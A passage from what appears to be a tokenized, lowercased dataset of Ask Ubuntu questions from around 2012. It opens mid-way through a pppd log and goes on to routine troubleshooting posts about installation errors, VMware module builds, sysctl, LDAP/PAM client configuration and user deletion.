pppd [ 15221 ] : protocol-reject for unsupported protocol 0xdd19 may 31 13:33:23 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xda26 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xac5 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x53a5 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x507e may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x1dc5 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xf87b may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x2f27 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xd10c may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x66ef may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xa294 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xb15 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x52a2 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xd863 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x8a96 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xde19 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x9763 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xb23 may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x83ca may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x964e may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xe8ae may 31 13:33:24 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xf614 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x9b1 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xf086 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xbff4 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x66c5 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xe42 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xf295 may 31 13:33:25 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x86fe may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x3bc1 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xbaad may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x88b5 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xd7a may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x30d5 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x2d8f may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x3933 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x8d42 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x4b4 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xa205 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x7cc5 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x1b6a may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xf004 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x21b6 may 31 13:33:26 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x51eb
144463	how can i get kindle for pc working on ubuntu 12.04 ?	how do i get kindle for pc working on ubuntu 12.04 ? kindle cloud ca n't copy paste so that 's not a good solution . the e-books seem to be encoded so that caliber can not open them/convert them , so unless i 've misunderstood something , that 's not a good solution .
144467	system updates list in 12.04	i have 12.04 installed on my main machine , and also inside a vm using vmware . both installations are identical . i have noticed that when i do updates , i get different updates on both installations . why is that ? also is there a way to see the a list of all the updates that have been downloaded ? thanks
144469	fake program runtime environment	is it possible to run a program in a fake environment ? i have a tool that requires a certain folder to be in /mnt/cdrom . i have the all the files from that cdrom stored in another folder , say /home/me/stuff . how can i pretend ( just for one run of that program ) that /home/me/stuff is actually /mnt/cdrom ? i do not have root access so mount will not work .
144470	how do i install microsoft visual studio ?	how do you install visual studio 2010 professional on ubuntu 11.10 ?
144471	installing latest ubuntu on old system	im installing ubuntu on an old computer that had windows xp on it . it had a corruption in the system 32 file and would n't boot up . so i burnt ubuntu 12.04 lts to a disc and booted it up . it got as far as preparing to install ubuntu , i clicked continue and it 's not doing anything . it 's not even loading from the disc drive i think .
144472	mythfrontend keeps loosing it 's settings on reboot	i 'm using mythbuntu 12.04 and i have it setup as a ltsp server . when i boot a fat-client as my 'mythfrontend ' it asks me the normal questions , language , server , username , password , then it saves that in the .mythtv/mysql.txt file . when i reboot my client it resets that file back to default . why does mythtv or ltsp do this ? the work around i use at the moment is to create a sript called ~/bin/start_myth with the following : # ! /bin/sh cp ~/mysql.txt ~/.mythtv mythfrontend the ~/mythtv.txt file holds the correct settings . i would like to remove this workaround and find out what exactly is causing this error .
144473	how to install ubuntu server inside windows	installation how do i install ubuntu server inside windows ? i want to install ubuntu server inside my windows desktop ?
144480	i ca n't enable wireless on a sony pcg-61315l	i 'm in need of help . i have a sony pcg-61315l . i just downloaded ubuntu and loaded it up . i go to network and it wo n't let me enable wireless no matter how many times i click to turn it on . the switch on the computer to turn on wifi is definitely switched on . any help is appreciated . the ubuntu i downloaded was 12.04 .
144484	ubuntu 12.04 lts slow , lag , hang and freeze all the time !	recently i installed ubuntu 12.04 lts on my sister 's laptop on 2nd partition ( 1st partition contains windows xp ) . my sister always complaining about ubuntu 12.04 for being slow , lags , hang and freeze all the time ! the image viewer and gimp always hang when opening image s above 2mb and it causes the desktop to hang as well . i have disabled all the compiz animations , but still the results are disappointing . my sister has lose her hope to use ubuntu and she asked me to remove ubuntu completely from her laptop . i 'm really embarrassed to my sister as i always brag about ubuntu for being good in performance , free from viruses , fast and other good stuff.. what should i do ? i really want her to use ubuntu instead of windows .
144488	add icons to dash menu from programs	how do i add program icons into dash menu in ubuntu 12.04 lts ? i have downloaded the newest libreoffice software and need some help with icons . does the ubuntu software store add titles frequently : i did n't see a newer title i could get from the software makers site ? thanks , donald
144493	how to not install virtualbox addition in ubuntu-server 12.04 ?	first when i finished installing ubuntu-server 12.04 , i made a snapshot then i updated my server like so sudo apt-get update & & sudo apt-get upgrade i think the guest addition via the ubuntu-repository is buggy . because after i rebooted i could n't see in my virtualbox-ubuntu-server-12.04 window . it was just black . i am following this tutorial and it said i need to update my server . that means i will get the virtualbox guest additions from the ubuntu-repository . how can i update upgrade my ubuntu server 12.04 without installing the guest addition from the ubuntu-repository ?
144498	what is the difference between the five versions of java on this page for ubuntu ?	i want to install java on my computer so that i can develop programs and i came across this page on java in the ubuntu community documentation . it says : java is a technology from oracle ( formerly : sun microsystems ) . there are several implementations , of which five will be discussed here : openjdk : the primary goal of the openjdk project is to produce an open-source implementation of the java se platform ( 6 and 7 ) . this is the default version of java that ubuntu uses and is the easiest to install . oracle ( sun ) java 6 : oracle ( sun ) java 6 is the reference implementation for java 6 . oracle java 7 : oracle java 7 is the reference implementation for java 7 . ibm java : ibm java is the preferred java solution on powerpc machines . it is a reimplementation with a just-in-time compiler . it is only available from ibm 's website . gnu compiler : a java compiler made by gnu . only developers should have to install this . i read the contents but still am a little confused . are they all different versions of jdk ? if not , then what ? and which one would you prefer ?
144518	login crash loop	after about the second/third batch of updates on a fresh install of ubuntu 12.04 , i end up getting stuck in an infinite login loop : i enter my password , screen goes black and shows me the end of the initialisation messages ( including things like cups initialising ) , and then the greeter reappears . kicker is , as i 'm using gnome-shell , i just decided to uninstall lightdm , ubuntu-desktop and unity-greeter , using gdm as my manager , and the problem still happens in exactly the same manner . i 'm lost even as to where to start looking - xorg logs , lightdm logs ( before i removed it ) , syslog and dmesg logs have held no unusual information at all . i have a tex assignment due next week , and reinstalling ubuntu every time i want to work on it is not going to work ( nor is using tex on windows ; ) . anything else i should try ?
144521	sysctl.conf ignore net settings	i have a little problem with sysctl on a ubuntu 10.04 lts system . when i set the sysctl values with `` sysctl -w `` all work fine , but when i try to use the sysctl.conf file . the net settings will be ignored . for example my sysctl.conf # /etc/sysctl.conf - configuration file for setting system variables kernel.domainname=findme.sysctl # corefiles information fs.suid_dumpable=2 kernel.core_pattern=/cores/core- % e- % s- % u- % g- % p- % t # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 3 # functions previously found in netbase net.ipv4.netfilter.ip_conntrack_tcp_timeout_fin_wait=1 net.ipv4.netfilter.ip_conntrack_tcp_timeout_close_wait=1 when i grep to the values , i can see that the sysctl settings for net.ipv4.netfilter do n't set . [ host : ~ ] $ sysctl -a | grep domainname kernel.domainname = findme.sysctl [ host : ~ ] $ sysctl -a | grep `` core_pattern '' kernel.core_pattern = /cores/core- % e- % s- % u- % g- % p- % t [ host : ~ ] $ sysctl -a | grep `` timeout_fin_wait '' net.netfilter.nf_conntrack_tcp_timeout_fin_wait = 120 net.ipv4.netfilter.ip_conntrack_tcp_timeout_fin_wait = 120 [ host : ~ ] $ sysctl -a | grep `` timeout_close_wait '' net.netfilter.nf_conntrack_tcp_timeout_close_wait = 60 net.ipv4.netfilter.ip_conntrack_tcp_timeout_close_wait = 60 can somebody help me to solve the problem ? if you need more information i can post it . cheers , steffen
144523	find . -type l says missing argument	i want to find all symbolic links in the current directory and below . therefore , i used : find . -type l running that clears the screen showing `` pattern not found ( press return ) '' at the bottom of the screen . after pressing return , i get : find : missing argument to `-type' here some system details : ubuntu 10.04 lts 64bit zsh 4.3.10 ( x86_64-unknown-linux-gnu ) happens also in screen version 4.00.03jw4 ( fau ) 2-may-06 find ( gnu findutils ) 4.4.2 so how do i search for symbolic links so that i can grep in their names ?
144526	how to flash a bios when only a windows binary is provided ?	i want to update the bios on toshiba qosmio-g30 . the exe file that i downloaded from the manufacture web site suppose to be os independent ! yet using wine loader could not execute the file . is there any way to update the bios using ubuntu ?
144527	correct place to set $ bibinputs environment variable	if i set the $ bibinputs environment varibale in my .zshrc , it is recognized by emacs-reftex ( via emacsclient ) , if i start emacs from my zsh commandline . however if i start using the menubar or gmrun it does n't knot this variable . so where is the correct place to set for the whole user environment ? if there are several alternatives , let me know . also if it changed between differend ubuntu-versions . edit : i have tried to set it in ~/.pam_environment like bstinputs= . : /home/myuser/bibtex/ : $ bstinputs bibinputs= . : /home/myuser/bibtex/ : $ bibinputs but it seems to have no effect ( even after rebooting ) and is not listed via printenv . i am currently using ubuntu natty + gdm + xmonad .
144528	quick keys in ubuntu	i want to know the quick keys available in ubuntu by default . is there a list of quick keys for hiding , closing ( alt+f4 ) , etc . how could i make my own ? thanks
144529	12.04 will not shutdown with many programs running	when i have many programs running , and try to shutdown the computer , it will get stuck . the shutdown flashes , and just does not do anything . so i have to push the power button to shutdown . is it a bug ?
144531	how do i install openstack ?	how do i install openstack ? is there an easier way other than official installation instructions ?
144543	packet sniffer found , what next ?	after a download yesterday my computer crashed . i updated today and checked for rootkits . i found a packet sniffer eth0 : packet sniffer ( /sbin/dhclient [ 3966 ] ) how can i remove this ?
144547	how to package a single text file into a .deb ?	i 'm trying to a make a simple .deb package , which would basically edit a config of another package i listed as a dependency . i added the required manipulations to the postinstall file . the problem is i ca n't find a way to package an example config , which should be copied and edited from the postinstall script . at the moment i just have a folder with the sample config , of which i 'm creating a tar.gz and orig.tar.gz , then dh_make in that folder , edit the generated files and run debuild . however if i open the resulting .deb file with an archive manager , i can see that the sample file was not included at all .
144548	has anyone achieved to embed an interactive 3d model into a pdf with ubuntu ?	i 've stumbled upon some 3d models embedded in a pdf , e.g . http : //cic.nist.gov/vrml/cis/designdata3.pdf however , with the recent adobe reader i am able to watch such pdfs and also view interactively at those 3d models . so the question is : could i generate such nice pdf with ubuntu too ? texlive ?
144549	how to install eclipse in ubuntu 12.04 ?	i downloaded the eclipse setup from their homepage . and i followed the instructions on this page . but i could n't able to follow the last instruction , which ask me to do so : /opt/eclipse/eclipse -clean if do so , i get an error message like this : sudo : /opt/eclipse/eclipse : command not found but notably i can see the eclipse icon on my dash home ( if i search for `` eclipse '' ) . but clicking on that icon does n't open the ide . where i 'm making the mistake ? and also running this command in terminal : eclipse throws this output : /usr/bin/eclipse : 5 : /usr/bin/eclipse : /opt/eclipse/eclipse : permission denied thanks in advance .
144551	ca n't install ubuntu 12.04 64-bit	i have a desktop running windows 8 with the following specifications : • core duo 3.2ghz processor • 4gb ram • 500gb hard drive every time i try to install ubuntu i get the following error : busybox v1.18.5 ( ubuntu 1:1.18.5-ubuntu4 ) built in shell ( ash ) enter 'help ' for a list of built on commands ( initramfs ) unable to find a medium containing a live file system please keep it simple . i 'm no programmer . : /
144561	what are the best tool to generate an rtp session ?	i want to generate some rtp traffic between windows and ubuntu and capture the packets using wireshark . this is for study purpose . what tools can i use for generating rtp traffic . whatever i tried requires sip . is there any tools which do n't require sip , can be used to generate rtp ( audio/video ... whatever ) . ? i am basically looking for an easy way . thanks
144562	what 's wrong with my vmware ?	i installed vmware on my ubuntu 12.04 from a .bundle file and the installation went just fine . now when i try to open it , it says before running , several modules must be compiled . and when i go ahead with it it gives me another error . here are the screen shots : also , the contents of that log file are : 2012-05-31t16:32:11.071+05:30| vthread-3| i120 : log for vmware workstation pid=25468 version=8.0.0 build=build-471780 option=release 2012-05-31t16:32:11.071+05:30| vthread-3| i120 : the process is 64-bit . 2012-05-31t16:32:11.071+05:30| vthread-3| i120 : host codepage=utf-8 encoding=utf-8 2012-05-31t16:32:11.071+05:30| vthread-3| i120 : host is linux 3.2.0-23-generic ubuntu 12.04 lts 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : msg_reset : 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /usr/lib/vmware/settings '' : no such file or directory . 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : pref optional preferences file not found at /usr/lib/vmware/settings . using default values . 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : msg_reset : 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/config '' : no such file or directory . 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : pref optional preferences file not found at /root/.vmware/config . using default values . 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : msg_reset : 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/preferences '' : no such file or directory . 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-05-31t16:32:11.070+05:30| vthread-3| i120 : pref failed to load user preferences . 2012-05-31t16:32:11.071+05:30| vthread-3| w110 : logging to /tmp/vmware-root/modconfig-25468.log 2012-05-31t16:32:11.163+05:30| vthread-3| i120 : modconf query interface initialized 2012-05-31t16:32:11.164+05:30| vthread-3| i120 : modconf library initialized 2012-05-31t16:32:11.191+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.195+05:30| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.195+05:30| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-31t16:32:11.195+05:30| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-31t16:32:11.195+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.197+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.204+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.226+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:11.226+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.229+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.237+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.260+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:11.286+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.290+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.295+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.300+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.305+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.334+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.339+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.344+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.348+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.353+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.356+05:30| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.356+05:30| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-31t16:32:11.356+05:30| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-31t16:32:11.356+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.359+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.370+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.401+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:11.436+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.441+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.446+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.450+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.452+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.454+05:30| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.454+05:30| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-31t16:32:11.454+05:30| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-31t16:32:11.454+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.458+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.470+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.507+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:11.563+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.568+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.573+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.578+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.579+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.761+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:11.762+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:11.764+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.773+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:11.801+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:11.802+05:30| vthread-3| i120 : building module vmmon . 2012-05-31t16:32:11.802+05:30| vthread-3| i120 : extracting the sources of the vmmon module . 2012-05-31t16:32:11.815+05:30| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-23-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-31t16:32:14.076+05:30| vthread-3| i120 : failed to compile module vmmon ! 2012-05-31t16:32:50.279+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.284+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.289+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.294+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.296+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.299+05:30| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:50.299+05:30| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-31t16:32:50.299+05:30| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-31t16:32:50.299+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:50.303+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:50.318+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:50.350+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:50.410+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.415+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.419+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.423+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.425+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.601+05:30| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-23-generic . 2012-05-31t16:32:50.601+05:30| vthread-3| i120 : validating path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic 2012-05-31t16:32:50.605+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:50.617+05:30| vthread-3| i120 : your gcc version : 4.6 2012-05-31t16:32:50.651+05:30| vthread-3| i120 : header path /lib/modules/3.2.0-23-generic/build/include for kernel release 3.2.0-23-generic is valid . 2012-05-31t16:32:50.651+05:30| vthread-3| i120 : building module vmmon . 2012-05-31t16:32:50.651+05:30| vthread-3| i120 : extracting the sources of the vmmon module . 2012-05-31t16:32:50.666+05:30| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-23-generic/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-31t16:32:51.492+05:30| vthread-3| i120 : failed to compile module vmmon !
144564	which kind of installation files should you prefer - .deb or tarball files ? and why ?	i have just starting ubuntu as my primary os and everytime i have to install something i generally try to find .deb files as that seems convenient , but someone on another forum told me i should always use tarball files . so can you tell me what would be the ideal recommendation and why ?
144566	ubuntu ca n't download files during update to 12.04 ( failed to fetch )	i have a fail during upgrade from 11.10 to 12.04 ( failed to fetch ) i 've been trying to update ubuntu from 11.10 to 12.04 for a while ( from update manager ) . but every time i do the update , after updater finished ( as it shoes on progress bar ) downloading of more then 2000 files , manager halts for 5 minuts and then show me following : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/f/fonts-nanum/fonts-nanum_3.010-2_all.deb соединение разорвано [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/f/fonts-unfonts-core/fonts-unfonts-core_1.0.3.is.1.0.2-080608-5ubuntu1_all.deb соединение разорвано [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/t/ttf-wqy-microhei/ttf-wqy-microhei_0.2.0-beta-1ubuntu1_all.deb соединение разорвано [ ip : 91.189.92.151 80 ] '' соединение разорвано '' -- translates as `` connection is broken '' i 've also switched to russian server . the same issue . failed to fetch http : //ru.archive.ubuntu.com/ubuntu/pool/main/f/fonts-nanum/fonts-nanum_3.010-2_all.deb соединение разорвано failed to fetch http : //ru.archive.ubuntu.com/ubuntu/pool/main/f/fonts-unfonts-core/fonts-unfonts-core_1.0.3.is.1.0.2-080608-5ubuntu1_all.deb соединение разорвано failed to fetch http : //ru.archive.ubuntu.com/ubuntu/pool/main/t/ttf-wqy-microhei/ttf-wqy-microhei_0.2.0-beta-1ubuntu1_all.deb соединение разорвано i try it for more then 2 weeks and every time happens all the same . some times ubuntu pops-up me `` whould you like to update '' notification with `` update '' button . some times i do it manualy from update manager . but also i ca n't manualy download following files -- browser ( chromium ) stops on half way of downloading them , wget halts at some piont . downloading problems are only on my machine in our office . my college on mac have no problems to get this files manualy . i 've never played with iptables or anything else on my machine . does anyone have any suggestions ?
144570	how to set 5.1 surround in the sound settings ?	i have a logitech g35 headset which should allow even up to 7.1 dolby surround but the sound settings identify it as a stereo only device . i configured the /etc/pulse/daemon.conf by setting the default channels to 6 and searched for many other solutions , but i have not found any working solutions .
144573	installing ubuntu v12	already run ubuntu v10 but wo n't automatically upgrade . can i just install v12 'over the top ' or do i have to save all files and settings etc to disc first ?
144574	delete a user and all files owned by this user	i have used deluser without the parameter -- remove-all-files : $ deluser 'user' is there a way other than rm -r /home/user to remove all files owned by a user now ( since i have already executed deluser ) ?
144586	how to configure ubuntu ldap client to get password policies from server ?	i have a ldap server on centos , 389-ds . i configured the client , ubuntu 12.04 , to authenticate on that base and it works very well . but it do n't gets the password policies from server . for example , if i set the policy to force user to change the password on first login , ubuntu ignores it and logs him in , always . how can i setup the client to get the policies ? here are the client files : /etc/nsswitch.conf passwd : files ldap group : files ldap shadow : files ldap hosts : files mdns4_minimal [ notfound=return ] dns mdns4 networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis sudoers : ldap files common-auth auth [ success=2 default=ignore ] pam_unix.so nullok_secure auth [ success=1 default=ignore ] pam_ldap.so use_first_pass auth requisite pam_deny.so auth required pam_permit.so auth optional pam_cap.so common-account account [ success=2 new_authtok_reqd=done default=ignore ] pam_unix.so account [ success=1 default=ignore ] pam_ldap.so account requisite pam_deny.so account required pam_permit.so common-password password requisite pam_cracklib.so retry=3 minlen=8 difok=3 password [ success=2 default=ignore ] pam_unix.so obscure use_authtok try_first_pass sha512 password [ success=1 user_unknown=ignore default=die ] pam_ldap.so use_authtok try_first_pass password requisite pam_deny.so password required pam_permit.so password optional pam_gnome_keyring.so common-session session [ default=1 ] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_umask.so session required pam_unix.so session optional pam_ldap.so session optional pam_ck_connector.so nox11 session optional pam_mkhomedir.so skel=/etc/skel umask=0022 /etc/ldap.conf base dc=a , dc=b , dc=c uri ldaps : //a.b.c/ ldap_version 3 rootbinddn cn=directory manager pam_password md5 sudoers_base ou=sudoers , dc=a , dc=b , dc=c pam_lookup_policy yes pam_check_host_attr yes nss_initgroups_ignoreusers avahi , avahi-autoipd , backup , bin , colord , daemon , games , gnats , hplip , irc , kernoops , libuuid , lightdm , list , lp , mail , man , messagebus , news , proxy , pulse , root , rtkit , saned , speech-dispatcher , sshd , sync , sys , syslog , usbmux , uucp , whoopsie , www-data /etc/ldap/ldap.conf base dc=a , dc=b , dc=c uri ldaps : //a.b.c/ ssl on use_sasl no tls_checkpeer no sudoers_base 